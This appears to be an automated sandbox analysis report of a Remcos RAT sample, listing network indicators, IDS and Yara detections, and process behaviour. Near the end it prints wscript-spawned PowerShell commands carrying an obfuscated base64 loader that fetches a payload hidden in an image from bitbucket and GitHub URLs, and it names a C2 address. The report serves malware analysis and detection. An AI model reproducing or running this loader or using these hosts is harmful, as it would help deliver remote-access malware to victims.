              Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 52.217.161.161:443 -> 192.168.2.6:49764
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorIPs: 154.216.17.141
              Source: global trafficTCP traffic: 192.168.2.6:49805 -> 154.216.17.141:5922
              Source: global trafficHTTP traffic detected: GET /adssgfdsg/testing/downloads/img_test.jpg?144417 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /cbff8810-ace3-4466-81b1-12ba7827c90a/downloads/6b181c48-ea9d-4bf0-91bd-66321b83871e/img_test.jpg?response-content-disposition=attachment%3B%20filename%3D%22img_test.jpg%22&AWSAccessKeyId=ASIA6KOSE3BNO4DHE4VD&Signature=T6wewlQZbJQSKGkGpdqwpwnElD0%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECcaCXVzLWVhc3QtMSJHMEUCIHdpGFp%2BMWJdC40IhWJ3SSuh%2F3P9BfkWVJgGy%2F5d%2FxJrAiEA7cnRTAkYqS7IEoVvpfPhmiGIFqnW%2BTusWS1k%2B1LqRikqsAIIkP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDJ3hZc5H13DpsrVvSiqEAljj%2Feh582Kf2l0rpXwuMkBTuVn5fmjxN%2F1UiGutq1P4eK6JpawNdKFwSb8l%2FBnJ7U5ngONu60OLxfc6clZbFgjDwM4%2Binq%2BtGirnaPvueTnkbFKwYcig0YN%2BXANfigCXdSciOrBg%2BF8ITeQUmtEngmT7cfpw%2FcS7o0Ca21R7rEL4sAFd%2FQGP4LHIKW4I8PHOJS7KDTwFSdbyJh0ZlsbBUKsG6nqervFT%2BkQqDFEvcCT3UE%2Bgf5YOa2Imez9jOuySSc0y0JrDCQxV0VL5777zwENSg149ioqUwRzrSQZ5r4uHdbGlyudfflZEMvBEQk5PSM9xVer2lqAPOQ8TCemuoAB0naRMM%2Fa2bgGOp0BRtpiv1UEzqz9j23bqShE4p37bMiYIPCEIVvttSlSIWNWclxJdsdz%2FKRhdxCMY6AmnPnHOIwyQPueK%2BLYy%2FV5HlKlvGL7cX5kPi6DbUpaR6DWxL6p2AoqNVyGjtCQwiwBbff1ljXgOuGBmoyLJFZstpwAA%2FyrPqTNeLsWXeL0vsNRfQh02Nz7sQLG0XBmnN05UIwxcpj6jLvFo2Veyw%3D%3D&Expires=1729524823 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /IJEUWAESIKA/skyapb/refs/heads/main/kgpmmrd.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 185.166.143.48 185.166.143.48
              Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
              Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
              Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
              Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
              Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49812 -> 178.237.33.50:80
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.141
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.141
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.141
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.141
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.141
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.141
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.141
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.141
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.141
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.141
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.141
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.141
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.141
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.141
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.141
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.141
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040F4A7 SetEvent,GetTickCount,DeleteFileW,ExitProcess,Sleep,Sleep,URLDownloadToFileW,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SetWindowTextW,StrToIntA,CreateThread,ShowWindow,SetForegroundWindow,ShowWindow,8_2_0040F4A7
              Source: global trafficHTTP traffic detected: GET /adssgfdsg/testing/downloads/img_test.jpg?144417 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /cbff8810-ace3-4466-81b1-12ba7827c90a/downloads/6b181c48-ea9d-4bf0-91bd-66321b83871e/img_test.jpg?response-content-disposition=attachment%3B%20filename%3D%22img_test.jpg%22&AWSAccessKeyId=ASIA6KOSE3BNO4DHE4VD&Signature=T6wewlQZbJQSKGkGpdqwpwnElD0%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECcaCXVzLWVhc3QtMSJHMEUCIHdpGFp%2BMWJdC40IhWJ3SSuh%2F3P9BfkWVJgGy%2F5d%2FxJrAiEA7cnRTAkYqS7IEoVvpfPhmiGIFqnW%2BTusWS1k%2B1LqRikqsAIIkP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDJ3hZc5H13DpsrVvSiqEAljj%2Feh582Kf2l0rpXwuMkBTuVn5fmjxN%2F1UiGutq1P4eK6JpawNdKFwSb8l%2FBnJ7U5ngONu60OLxfc6clZbFgjDwM4%2Binq%2BtGirnaPvueTnkbFKwYcig0YN%2BXANfigCXdSciOrBg%2BF8ITeQUmtEngmT7cfpw%2FcS7o0Ca21R7rEL4sAFd%2FQGP4LHIKW4I8PHOJS7KDTwFSdbyJh0ZlsbBUKsG6nqervFT%2BkQqDFEvcCT3UE%2Bgf5YOa2Imez9jOuySSc0y0JrDCQxV0VL5777zwENSg149ioqUwRzrSQZ5r4uHdbGlyudfflZEMvBEQk5PSM9xVer2lqAPOQ8TCemuoAB0naRMM%2Fa2bgGOp0BRtpiv1UEzqz9j23bqShE4p37bMiYIPCEIVvttSlSIWNWclxJdsdz%2FKRhdxCMY6AmnPnHOIwyQPueK%2BLYy%2FV5HlKlvGL7cX5kPi6DbUpaR6DWxL6p2AoqNVyGjtCQwiwBbff1ljXgOuGBmoyLJFZstpwAA%2FyrPqTNeLsWXeL0vsNRfQh02Nz7sQLG0XBmnN05UIwxcpj6jLvFo2Veyw%3D%3D&Expires=1729524823 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /IJEUWAESIKA/skyapb/refs/heads/main/kgpmmrd.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: bitbucket.org
              Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
              Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: svchost.exe, 0000000C.00000002.3508659507.0000011BAF400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
              Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: edb.log.12.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: RegAsm.exe, 00000008.00000002.3509300667.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: RegAsm.exe, 00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp(cZ
              Source: RegAsm.exe, 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: RegAsm.exe, 00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp6
              Source: RegAsm.exe, 00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
              Source: powershell.exe, 00000006.00000002.2379283237.000001F505933000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
              Source: powershell.exe, 00000006.00000002.2379283237.000001F500222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000006.00000002.2379283237.000001F504260000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000003.00000002.2679834341.0000028186F6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F500001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000006.00000002.2379283237.000001F504260000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: powershell.exe, 00000006.00000002.2379283237.000001F500222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000003.00000002.2679834341.0000028186F29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
              Source: powershell.exe, 00000003.00000002.2679834341.0000028186F3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F500001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000006.00000002.2379283237.000001F504260000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F505256000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F50527C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
              Source: powershell.exe, 00000006.00000002.2379283237.000001F505256000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F50527C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
              Source: powershell.exe, 00000006.00000002.2379283237.000001F5003F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
              Source: powershell.exe, 00000006.00000002.2379283237.000001F5003F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
              Source: powershell.exe, 00000006.00000002.2379283237.000001F5003F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
              Source: powershell.exe, 00000006.00000002.2379283237.000001F5003FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com
              Source: powershell.exe, 00000006.00000002.2379283237.000001F5003FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/cbff8810-ace3-4466-81b1-12ba7827c90a/downloads/6b181c48-ea9d-
              Source: powershell.exe, 00000006.00000002.2379283237.000001F500222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
              Source: powershell.exe, 00000003.00000002.2679834341.000002818745F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F5045C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F500222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417
              Source: powershell.exe, 00000006.00000002.2379283237.000001F5003F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
              Source: powershell.exe, 00000006.00000002.2379283237.000001F5003F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
              Source: edb.log.12.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
              Source: svchost.exe, 0000000C.00000003.2433659954.0000011BAF600000.00000004.00000800.00020000.00000000.sdmp, edb.log.12.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
              Source: powershell.exe, 00000006.00000002.2379283237.000001F500222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000006.00000002.2379283237.000001F5055F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F5045C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F505933000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000006.00000002.2379283237.000001F504026000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
              Source: powershell.exe, 00000006.00000002.2379283237.000001F504026000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/IJEUWAESIKA/skyapb/refs/heads/main/kgpmmrd.txt
              Source: powershell.exe, 00000003.00000002.2679834341.000002818745F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F5045C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F500222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723
              Source: powershell.exe, 00000006.00000002.2379283237.000001F5003F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
              Source: powershell.exe, 00000006.00000002.2379283237.000001F5003F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
              Source: powershell.exe, 00000006.00000002.2379283237.000001F5003F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
              Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.6:49758 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.217.161.161:443 -> 192.168.2.6:49764 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:49789 version: TLS 1.2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040F4A7 SetEvent,GetTickCount,DeleteFileW,ExitProcess,Sleep,Sleep,URLDownloadToFileW,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SetWindowTextW,StrToIntA,CreateThread,ShowWindow,SetForegroundWindow,ShowWindow,8_2_0040F4A7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040F4A7 SetEvent,GetTickCount,DeleteFileW,ExitProcess,Sleep,Sleep,URLDownloadToFileW,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SetWindowTextW,StrToIntA,CreateThread,ShowWindow,SetForegroundWindow,ShowWindow,8_2_0040F4A7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040F4A7 SetEvent,GetTickCount,DeleteFileW,ExitProcess,Sleep,Sleep,URLDownloadToFileW,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SetWindowTextW,StrToIntA,CreateThread,ShowWindow,SetForegroundWindow,ShowWindow,8_2_0040F4A7

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7436, type: MEMORYSTR

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Contains functionalty to change the wallpaper
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00414D7F SystemParametersInfoW,8_2_00414D7F

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: Process Memory Space: powershell.exe PID: 1880, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 1812, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##Zg